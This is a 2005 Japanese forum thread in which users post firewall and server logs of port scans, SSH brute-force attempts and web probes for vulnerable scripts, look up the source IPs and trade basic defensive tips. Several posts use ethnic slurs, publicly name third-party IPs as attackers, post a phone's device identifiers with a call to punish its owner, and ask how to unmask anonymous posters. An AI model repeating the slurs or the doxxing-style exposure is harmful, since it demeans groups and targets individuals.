いや、馬鹿な質問してゴメス。 ただ単に向こうのIP使って串刺そうかなと思ったんだけど、 よくよく考えたらTor使ってるからいいか、と自己解決しますた。
2005-09-18 17:45:03 CLOSE TCP 61.211.38.52 206.223.148.200 3753 80 - - - - - - - - - 2005-09-18 17:45:48 DROP UDP 0.0.0.0 255.255.255.255 68 67 330 - - - - - - - RECEIVE 2005-09-18 17:45:53 DROP UDP 0.0.0.0 255.255.255.255 68 67 330 - - - - - - - RECEIVE 2005-09-18 17:46:00 DROP UDP 0.0.0.0 255.255.255.255 68 67 330 - - - - - - - RECEIVE 2005-09-18 17:46:16 DROP UDP 0.0.0.0 255.255.255.255 68 67 330 - - - - - - - RECEIVE 2005-09-18 17:46:41 CLOSE UDP 61.211.38.52 202.238.95.24 1050 53 - - - - - - - - - 2005-09-18 17:47:26 OPEN TCP 61.211.38.52 206.223.148.200 3759 80 - - - - - - - - - 2005-09-18 17:47:26 CLOSE TCP 61.211.38.52 206.223.148.200 3759 80 - - - - - - - - - 2005-09-18 17:47:28 OPEN TCP 61.211.38.52 206.223.148.200 3760 80 - - - - - - - - - 2005-09-18 17:47:29 CLOSE TCP 61.211.38.52 206.223.148.200 3760 80 - - - - - - - - - 2005-09-18 17:47:35 OPEN TCP 61.211.38.52 206.223.148.200 3761 80 - - - - - - - - - 2005-09-18 17:47:36 CLOSE TCP 61.211.38.52 206.223.148.200 3761 80 - - - - - - - - - 2005-09-18 17:48:54 OPEN UDP 61.211.38.52 202.238.95.24 1050 53 - - - - - - - - - 2005-09-18 17:48:54 OPEN TCP 61.211.38.52 210.150.10.177 3763 80 - - - - - - - - - 2005-09-18 17:49:15 OPEN TCP 61.211.38.52 210.150.25.213 3765 80 - - - - - - - - - 2005-09-18 17:49:15 CLOSE TCP 61.211.38.52 210.150.25.213 3765 80 - - - - - - - - - これアクセス成功のログのほんの一部なんだけどやばい? つーか特定IP弾くやり方わかんね(;^ω^)
>>755 環境を書くよろし。
ルータorモデム、できればその機種名、接続の方法、マシンの種類(OS)、
サーバー系アプリの稼働の有無、ログ確認の方法など。
ルータorモデム→モデム 機種名 VDSL装置VD-100 接続の方法→種類のこと・・・? 光 マシンの種類(OS)→WinXP サーバー系アプリの稼働の有無→UDとかやったかも ログ確認の方法→ファイアーウォール設定からログの設定で取ったログ こんなんでよろし?
>>757 Win XPのパーソナルファイアーウォールのみお使いですね。
あいにくうちにはWin XPがないので、どなたかよろしくです。
ログはとりあえず大丈夫そうではありますが。
常時接続環境では、できればルータをはさんで使われるのがいいですよ。
最近では数千円からあるし、一般的な「端末型接続」の場合は設定も簡単ですし。
サーバー立ててたり、「ネットワーク型接続」の場合は少々複雑な設定が必要ですが。
IPアドレス 222.5.198.174 ホスト名 zk198174.ppp.dion.ne.jp 割当国 ※ 日本 (JP) 都道府県 兵庫県
218.238.5.27 しつけーぞチョソ公
761 :
757 :2005/09/19(月) 19:37:02
さっきからノートンが反応しまくりな訳だが… 202.103.178.139 シナチクウゼー!
>>762 に書かれてるのと同じIPからポートスキャン受けつづけてる訳ですが。
202.103.178.139 TCP 80 202.103.178.39 TCP 80 inetnum: 202.103.128.0 - 202.103.191.255 netname: CHINANET-GD descr: CHINANET Guangdong province network
ルータを導入しようキャンペーン実施中!
202.103.178.139 ウチにも昨日からずーっと来てる
IPアドレス 221.117.212.123 ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
770 :
名無しさん@お腹いっぱい。 :2005/09/25(日) 16:45:17
IPアドレス 210.251.54.44 ホスト名 G054044.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 種別不明 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:10 > 169.254.0.2:2444 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:11 > 169.254.0.2:2445 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:12 > 169.254.0.2:2446 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:13 > 169.254.0.2:2447 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:14 > 169.254.0.2:2448 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:15 > 169.254.0.2:2449 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:16 > 169.254.0.2:2450 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:17 > 169.254.0.2:2451 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:18 > 169.254.0.2:2452 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:28 > 169.254.0.2:2462 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:29 > 169.254.0.2:2463 2005/09/25 16:40:35: LAN2 Rejected at IN(default) filter: TCP 210.251.54.44:30 > 169.254.0.2:2464
771 :
名無しさん@お腹いっぱい。 :2005/09/25(日) 16:59:23
YahooBB221057056007.bbtec.net
773 :
名無しさん@お腹いっぱい。 :2005/09/26(月) 00:45:49
ルーターかましてないの? モデムだけ?
日本大学 Sep 26 01:20:27 *** sshd[4375]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ttaserv.s.cn.cst.nihon-u.ac.jp Sep 26 01:20:29 *** sshd[4375]: Failed password for invalid user amanda from 133.43.109.14 port 45056 ssh2
1433/TCP SCAN 2005/09/26 10:42:26 219.102.59.60 / 3798 2005/09/26 10:42:23 219.102.59.60 / 3798 2005/09/26 10:35:24 219.102.59.60 / 3613 2005/09/26 10:35:21 219.102.59.60 / 3613 2005/09/26 10:14:53 219.102.59.60 / 4151 2005/09/26 10:14:50 219.102.59.60 / 4151 IPアドレス 219.102.59.60 ホスト名 pl1724.nas921.sendai.nttpc.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 宮城県 市外局番 -- 接続回線 xDSL
>722 12-219-249-10.client.mchsi.com だよ
778 :
名無しさん@お腹いっぱい。 :2005/09/27(火) 05:38:37
>>774-775 うちにも来たなぁ、22日早朝。ttaserv.s.cn.cst.nihon-u.ac.jpから。
なさけねーなー。
こういうのは大学に連絡するといいかもしれん。
YahooBB221057056007.bbtec.net
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 210.196.112.160/28 b. [ネットワーク名] SEIBI-NET f. [組織名] 株式会社 セイビ 会社からって馬鹿か?
ポート書かないのも似たようなもん。
ルーターのログ見てるとひたすら 2005/09/27 22:36:51 FILTER TCP connection denied from 219.159.134.*:4253 to 192.168.2.2:445 (eth1) 2005/09/27 22:35:22 FILTER TCP connection denied from 219.159.92.*:2245 to 192.168.2.2:445 (eth1) 2005/09/27 22:35:19 FILTER TCP connection denied from 219.159.92.*:2245 to 192.168.2.2:445 (eth1) 2005/09/27 22:26:03 FILTER TCP connection denied from 219.95.173.*:1589 to 192.168.2.2:445 (eth1) 2005/09/27 22:26:00 FILTER TCP connection denied from 219.95.173.*:1589 to 192.168.2.2:445 (eth1)
24.11.58.88
ICC Profile TagData Overflow 侵入者: dl1.n1e.jp(59.159.192.37)(http(80)) 危険度: 高レベル プロトコル: TCP 攻撃された IP: localhost. 攻撃された ポート: 1577 こいつ夜中じゅうずっと攻撃してくる・・ 検索結果↓ IPアドレス 59.159.192.37 ホスト名 59x159x192x37.ap59.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 不明 市外局番 -- 接続回線 光 Domain Information: [ドメイン情報] a. [ドメイン名] UCOM.NE.JP b. [ねっとわーくさーびすめい] ゆーこむねっと c. [ネットワークサービス名] ユーコムネット d. [Network Service Name] UCOM-NET k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] AT047JP n. [技術連絡担当者] AT047JP p. [ネームサーバ] ns01.usen.ad.jp p. [ネームサーバ] ns02.usen.ad.jp [状態] Connected (2006/06/30) [登録年月日] 2005/06/24 [接続年月日] 2005/06/24 [最終更新] 2005/06/24 16:32:04 (JST)
Sep 30 06:05:26 **** sshd[14641]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=tostv.jp user=root Sep 30 06:05:28 **** sshd[14641]: Failed password for root from 202.229.26.107 port 31311 ssh2 > テレビ大分Webサイトは、リニューアルオープン準備中です。 って、大丈夫か?
>>785 そういうの、連絡してみるといいよ。
そちらのサーバーから不正アクセスを受けたんですが、と。
もちろん日時や内容を具体的に説明すること。
61.233.40.205 61.233.40.84 早く支那畜ネット禁止に汁!
789 :
名無しさん@お腹いっぱい。 :2005/10/01(土) 22:35:22
ノートン先生のログに残っていたIPですが、検索しても正体がわかりません。 教えてだれかエロい人 169.254.104.252
791 :
善人代表 :2005/10/02(日) 01:22:11
DoCoMo/2.0 F900i(c100;TB;W22H12;ser350233007373999;icc8981100010345570585f) この携帯の持ち主携帯の サイトを荒らし回る糞です どなたか裁きをm(__)m
794 :
名無しさん@お腹いっぱい。 :2005/10/02(日) 04:27:01
>>790 dクス でも、わかったような、よくわからないような。勉強してみます。
795 :
名無しさん@お腹いっぱい。 :2005/10/02(日) 12:09:16
70.84.34.194 194.70-84-34.reverse.theplanet.com こいつ毎日ひたすら攻撃してくる。 マジで死ね。
796 :
名無しさん@お腹いっぱい。 :2005/10/02(日) 15:05:59
IPを表示してない掲示板で中傷してる奴のIP調べる方法ってありますか??
>>796 裏2ちゃんのハッカーズ板のプログラム倉庫で探せ
裏2ちゃんへの行き方教えて
>>793 なんかコレ Linux 起動している時だけ来てる悪寒……何故だ orz
可能性1)Linuxにトロイが棲んでる
>>800 ども。そですね。Windows の PFW ソフトならソフト毎に掴まえられるんだけど。
どうしてものか。とりあえず、iptalbes で外に出ようとるすパケット全部捕捉してみよう。
>>799 apacheのログでしょ?
オープンプロキシーを探そうとしているように見えるけんど。
必要なければapacheデーモン切ればいいし、必要ならルータ挟む方が楽かも。
iptalbesはめんどいし。設定作業を補助してくれるツールがありそうな気はするけど。
803 :
名無しさん@お腹いっぱい。 :2005/10/03(月) 15:01:48
吉田武仁
Oct 3 05:26:02 **** sshd[25038]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ganbare-tencho.jp user=root Oct 3 05:26:04 **** sshd[25038]: Failed password for root from 210.172.185.53 port 48248 ssh2 頑張れ♪店長! Oct 2 03:13:31 **** sshd[30925]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=x221-254-238-126.uc0.unresolve.storm.ne.jp user=root Oct 2 03:13:33 **** sshd[30925]: Failed password for root from 221.254.238.126 port 41432 ssh2 これは何処?
806 :
名無しさん@お腹いっぱい。 :2005/10/03(月) 23:23:42
漏れのルーター設定は、メインサーバー(192.168.5.97)をDMZに設定しているからルータはさんでもセキュリティ面では意味なし
>>804 どっちもうちのサーバにも来たなぁ。
なさけないねぇ、こういう会社。
2005/10/04(08:27:46) W-SV p548DF690.dip.t-dialin.net(84.141.246.144) [80] 302 29 "HEAD / HTTP/1.0" HEADリクエストきたこれ。
809 :
名無しさん@お腹いっぱい。 :2005/10/04(火) 17:57:57
最近、このIPうざいんだよ! 127.0.0.1 みんなで潰さねぇ?
自殺イクナイ
>>809 俺も
127.0.0.2
からのアクセスが酷いです。
要するに127.0.0.1は
>>809 自身のアドレスだったわけかw
よっしゃー、俺もつぶしに協力しちゃうぜ(゚∀゚)ニヤニヤ
219.167.126.53 このIPが進入検地にすごいひっかかる。 一日あたり1000以上・・・ IPブロックしてるから大丈夫だと思うんだけど、なんだか怖い・・・ ウイルススキャンもしたし、スパイウェアも見つけられる限り除去したし、 なんなんだろう・・・ 初心者だからしらべかたがわからん・・・ このIPの詳しい情報きぼんぬ。
>>814 IPアドレス 219.167.126.53
ホスト名 i219-167-126-53.s05.a024.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 三重県
市外局番 --
接続回線 光
ルータを購入して「ステルス」にしまひょ。
2005/10/05(13:41:11) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /thisdoesnotexistahaha.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:12) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /blahnot/thisdoesnotexistahaha.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:32) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /community/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:33) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /blogs/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:34) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:35) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /blog/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:36) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:37) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /b2/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/05(13:41:38) W-SV covil.co.uk(217.160.172.21) [80] 404 0 "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" ( dummy ) また脆弱性か?非常にうざすぎる。
シナ竹202.111.173.43は最近常連だが 東京ヤフ221.18.36.4が猛追しているここ2・3日
晒しage IPアドレス 221.117.212.123 ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道
820 :
名無しさん@お腹いっぱい。 :2005/10/09(日) 00:56:13
206.223.147.230
210.132.75.18 (bpg.sayclub.jp) からSSHスキャン。もうアホかと。
221.191.200
IPアドレス 218.31.113.236
http://www.apnic.net/db/dbcopyright.html netname: CHINANET-XJ
descr: CHINANET xinjiang province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: LZ38-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-XINJIANG
status: ASSIGNED NON-PORTABLE
changed:
[email protected] 20000701
changed:
[email protected] 20020104
changed:
[email protected] 20040927
source: APNIC
person: Chinanet Hostmaster
address: No.31 ,jingrong street,beijing
address: 100032
country: CN
phone: +86-10-66027112
fax-no: +86-10-58501144
e-mail:
[email protected] e-mail:
[email protected] nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed:
[email protected] 20021016
remarks: hostmaster is not for spam complaint,please send spam complaint to
[email protected] address: CHINA
中国からの攻撃? TCP SYN FLOOD攻撃をうけている
>>788 うちにもその二つが来る・・
9月下旬からずっと毎日・・
202.216.225.1
202.79.240.226
221.112.231.213 (221x112x231x213.ap221.ftth.ucom.ne.jp) からSSHスキャン。
2005/10/11(01:13:24) W-SV 218.41.174.211 [80] 400 0 "GET http//www.spedia.net/sp_login.htm HTTP/1.1" ( dummy )
829 :
名無しさん@お腹いっぱい。 :2005/10/12(水) 11:42:20
IPアドレス 61.195.30.147 ホスト名 www.lvg.co.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
206.223.151.10HackerWatchにレポートしちゃったorz
(;^ω^)
834 :
831 :2005/10/12(水) 19:57:12
オレの場合、すごい勢いでSYN仕掛けてくるヤシらがいるんだけど Winnyやってるのが関係してんのかな?
835 :
名無しさん@お腹いっぱい。: :2005/10/12(水) 22:28:58
YahooBB221064096010.bbtec.net このIPがどうも気になる 情報キボンヌ
216.74.57.104 .....
61.197.168.70 (user03.meisei-c.co.jp) からSSHスキャン。
839 :
名無しさん@お腹いっぱい。 :2005/10/13(木) 10:16:41
2005/10/12(23:59:58) W-SV 218.69.238.85 [80] 400 0 "GET http//www.starinfo.net.cn/ HTTP/1.1" ( dummy ) 2005/10/13(07:18:04) W-SV dastier.init0.org(64.17.230.66) [80] 404 0 "GET /aidepulamea.php HTTP/1.1" ( dummy ) 2005/10/13(07:18:05) (中略) 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/13(07:18:18) (中略) 404 0 "GET /aidepulamea.php HTTP/1.1" ( dummy ) 2005/10/13(07:18:18) (中略) 404 0 "POST /wordpress/xmlrpc.php HTTP/1.1" ( dummy ) 2005/10/13(07:18:04)から2005/10/13(07:18:18)まで延々と繰り返してる(2回/秒) テラウザスwwwwwwww
58.241.242.20。ポート55519って何の穴だ?
俺も昔webサーバー立ち上げてたとき、
>>839 の1番上みたいなのが多かった。
AOLのアドレスが多かったけど、当時は、@AOL内のDNS設定が間違ってるのか、
ルーターが相手先IPを見て振り分けるから、Aどこか途中のルーターの設定ミス
と思ってた。
@の可能性<<<<<Aの可能性
HTTPで脆弱性狙い。はじめてみるタイプの足跡だけど、対象のツールは何ですか? IPアドレスが韓国だから調べてもしょうがないか。 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /osc/admin/file_manager.php HTTP/1.1" 403 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /osCommerce/catalog/admin/file_manager.php HTTP/1.1" 403 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /catalog/admin/file_manager.php HTTP/1.1" 403 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /admin/file_manager.php HTTP/1.1" 403 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /oscommerce/admin/file_manager.php HTTP/1.1" 403 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /store/admin/file_manager.php HTTP/1.1" 403 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /onlineshop/admin/file_manager.php HTTP/1.1" 403 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 211.46.21.171 - - [13/Oct/2005:23:00:24 +0900] "GET /shop/admin/file_manager.php HTTP/1.1" 403 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
4297番ポートへのアクセスって流行ってるの?
202.103.178.* がたまにくる
Port39145って何
つ【210.178.71.1】
61.199.233.171 (mail.castec.co.jp) からSSHスキャン。
昨日はここからSSHスキャン。 202.222.31.79 (gplanet.biz)
849 :
名無しさん@お腹いっぱい。 :2005/10/16(日) 14:26:49
219.101.193.134からポートスキャン Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 219.101.192.0/23 b. [ネットワーク名] SBMM-1-NET f. [組織名] ソフトバンク・メディア・アンド・マーケティング株式会社 g. [Organization] SOFTBANK Media & Marketing Corp. m. [管理者連絡窓口] NY1573JP n. [技術連絡担当者] NY1573JP p. [ネームサーバ] binah.mm.softbank.co.jp p. [ネームサーバ] cochma.mm.softbank.co.jp [割当年月日] 2002/10/24 [返却年月日] [最終更新] 2003/06/23 11:14:29(JST)
最近よく来るなぁ 61.248.51.135
どうやったら不正アクセスしてるってわかるの?
でも全然カブらないね。つまり ここに出てるのウチにも来てるかなって検索しても当たらないし 逆にウチに来てるのが『こんなにしつこいんだからきっと・・・』と思って 検索しても誰も書いてない。 今まで一個も無いよ。ウチに来てるのがここに載ってるのって。 つってもそんなにしょっちゅう検索してないからアレだけど。
でもグーグルで検索するとIPフィルタみたいのに ひっかかりまくり。ま当然かもしれんけど。
855 :
名無しさん@お腹いっぱい。 :2005/10/16(日) 21:46:37
ソフトバンクが何でスキャンしてんだ?
856 :
名無しさん@お腹いっぱい。 :2005/10/17(月) 00:51:04
222.147.183.70 こいつマジムカツク
>>851 サーバーならログをチェックする。
必要のないアクセスログがあればそれは不正アクセスといえる。
sshログインやftpの試み、httpでopen proxyを探すアクセスとかね。
pop3やimapへの接続を試みるやつもいる。
現在ではやたらと多いので、基本的にはログインではねるのではなく、
その前の段階の接続自体ではねてしまうのが無難だけども、
接続を開けておく必要のあるものについては不正アクセスの足跡がたくさんみられる。
tetkyo043171.tkyo.te.ftth2.ppp.infoweb.ne.jp(211.133.49.171) こいつしつこい。さっきから/getしまくり。ウイルスか何かなんだろうけど。 2005/10/17(09:11:26) W-SV tetkyo043171.tkyo.te.ftth2.ppp.infoweb.ne.jp(211.133.49.171) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/10/17(10:31:00) W-SV tetkyo043171.tkyo.te.ftth2.ppp.infoweb.ne.jp(211.133.49.171) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/10/17(10:36:32) W-SV tetkyo043171.tkyo.te.ftth2.ppp.infoweb.ne.jp(211.133.49.171) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/10/17(11:20:02) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(12:10:33) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(12:13:53) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(12:25:53) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(12:41:23) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]"
いろんなIPから同じポートにアクセスしてくるのって狙われてるんですかね?
860 :
858 :2005/10/17(月) 15:53:46
2005/10/17(13:05:50) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(13:29:04) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(15:39:37) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 2005/10/17(15:43:43) W-SV 211.133.49.171 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.49.171 ]" 勘弁してくれ。
2005/10/17(15:54:12) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 302 29 "GET /cgi-bin/awstats/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:13) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 302 29 "GET /cgi-bin/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:13) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /cgi/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:14) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /awstats/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:15) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /cgi-bin/stats/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:16) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /stats/awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:18) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /awstats.pl HTTP/1.1" ( dummy ) 2005/10/17(15:54:19) W-SV b03C9.static.pacific.net.au(203.100.236.201) [80] 404 0 "GET /cgi/stats/awstats.pl HTTP/1.1" ( dummy ) リアルタイムで見てしまった。例の脆弱性か。連投すまぬ。
>>859 たぶん狙われてるわけじゃなく、それだけ不正アクセスの試みが多いだけの話。
不正アクセス元はワームなんかで増殖するからね。
もしあなたのところがセキュリティ緩くて侵入されたら、
あなたのところが一つの新しい不正アクセス元となって次を狙っていく。
863 :
名無しさん@お腹いっぱい。 :2005/10/17(月) 17:27:16
>855 個人情報垂れ流ししてその上覗いてるなんて腐れ会社 もいいとこ
baym-cs107.msgr.hotmail.com
test
すみません、質問ですが 2チャンネルに書き込むとIPアドレスなど他人にバレてしまうものなのですか? また、他人が探索できるようなツールなどは存在するのですか? 2ちゃんねるは匿名性が高いと聞いていたのですが・・・ PCに詳しい方々、教えてください、お願いします。
868 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 18:37:40
210.139.249.86
869 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 18:43:39
↑ IPアドレス 210.139.249.86 ホスト名 blog.so-net.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし a. [ドメイン名] SO-NET.NE.JP b. [ねっとわーくさーびすめい] c. [ネットワークサービス名] So-netサービス d. [Network Service Name] So-net Service k. [組織種別] ネットワークサービス l. [Organization Type] Network Service m. [登録担当者] MK2734JP n. [技術連絡担当者] SW314JP n. [技術連絡担当者] YO078JP p. [ネームサーバ] dnss3.so-net.ne.jp p. [ネームサーバ] dnss4.so-net.ne.jp p. [ネームサーバ] dnss5.so-net.ne.jp p. [ネームサーバ] dnss6.so-net.ne.jp p. [ネームサーバ] dnss7.so-net.ne.jp
>>869 貴様はblog.so-net.ne.jpのblogって文字すら読めないのか?
871 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 19:04:28
>>870 Blogって、あのブログでしょう?
FWの攻撃ログにこういう説明がしてあった。
不正な PNG (Portable Network Graphic) 要求が行われました。これは、
攻撃者がサービス不能攻撃を実行しようとしていることを示す可能性が
あります。 PNG プロトコルは、画像の圧縮と保存に使用されるファイル
形式です。
872 :
名無しさん@お腹いっぱい。 :2005/10/18(火) 21:33:55
脳豚先生が NMap Xmas Scan を遮断しました みたいなこといってッけど これって不正アクセスだよな? ぐぐったらポートスキャンツールみたいだし・・・。
873 :
名無しさん@お腹いっぱい。 :2005/10/19(水) 07:10:31
IPで住所まで弾き出せるんか? それと、そういうのを弾き出すソフトはあるんか?
2005/10/19(06:38:45) W-SV usr211128026225.usr.starcat.ne.jp(211.128.26.225) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/10/19(07:03:40) W-SV 同上 2005/10/19(08:03:31) W-SV 同上 2005/10/19(09:46:10) W-SV 211.128.26.225 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.128.26.225 ]" 朝見つけて拒否登録したらこれだよ。ちなみにこないだの連続がしつこかったから久しぶりにWAN側IP変更した。
218.108.248.124
Neo
2005/10/21(05:23:18) W-SV 216.191.34.5 [80] 404 0 "GET /phpmyadmin/index.php HTTP/1.1" ( )
879 :
名無しさん@お腹いっぱい。 :2005/10/21(金) 10:37:47
>823 それ、うちにも来てる・・・
IPアドレス 202.181.105.159 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし a. [IPネットワークアドレス] 202.181.96.0-202.181.107.255 b. [ネットワーク名] SAKURA-NET f. [組織名] エスアールエス・さくらインターネット株式会社 g. [Organization] SRS SAKURA Internet Inc. m. [管理者連絡窓口] KT749JP n. [技術連絡担当者] KW419JP p. [ネームサーバ] ns1.dns.ne.jp p. [ネームサーバ] ns2.dns.ne.jp
881 :
名無しさん@お腹いっぱい。 :2005/10/21(金) 11:59:49
211.222.250.90
219.115.231.78 59.44.51.49
884 :
名無しさん@お腹いっぱい。 :2005/10/21(金) 15:10:52
不正アクセスかどうか分からないのですが、自分が運営しているサイトに 複数の荒らしが来ています。 222.144.240.185 221.190.64.236 222.147.251.71 の3人なのですが調べてみると同じ大阪北OCN(?)からのアクセスと判明しました。 串を使ったからIPがそれぞれ違うのでしょうか? 自分は初心者なのでそこの所が良く分からないです。 スレ違いかもしれ無いですがご指導宜しくお願いします。
でも突然何にもなくなるとすごく不安になるな。 FWがバカになったのかと思う。で、またいつものように 赤いのが付くとほっと安心する。
FWってルータのやつだけど
ダイアルアップイなんだけどさ、 IP:66.215.187.213 発信元ポート:N/A こいつが「Echo Request」送ってくるんだけど放置していい?
888 :
名無しさん@お腹いっぱい。 :2005/10/21(金) 21:43:04
192.168.11.1
UDP connection denied from 62.35.203.86:6985 to 220.221.121.142:6703 (ppp0) TCP connection denied from 82.212.48.60:61877 to 220.221.121.142:6703 (ppp0) UDP connection denied from 80.170.139.211:6346 to 220.221.121.142:6703 (ppp0) TCP connection denied from 70.153.14.53:4215 to 220.221.121.142:6703 (ppp0) TCP connection denied from 80.5.127.79:32832 to 220.221.121.142:6703 (ppp0) こんなふうにいろんなIPから同じポートに来るのってなんなの?
891 :
名無しさん@お腹いっぱい。 :2005/10/21(金) 23:30:40
Winny
1分おきに「203.178.137.103」からIPv6のOSPFが飛んでくるんですが WIDE Project って何もの?
ぐぐれ
82.165.179.165
IPアドレス 220.209.102.118 ホスト名 ntkngw094118.kngw.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 光
896 :
名無しさん@お腹いっぱい。 :2005/10/22(土) 13:28:06
今日は支那チョソが多いな
897 :
名無しさん@お腹いっぱい。 :2005/10/22(土) 15:33:03
IPを調べると、文字化けして表示されるのですが、直す方法ありますか?
899 :
名無しさん@お腹いっぱい。 :2005/10/22(土) 16:01:20
220.150.31.17
>>897 そのチェックサイトのCGIがダメなんじゃないの?
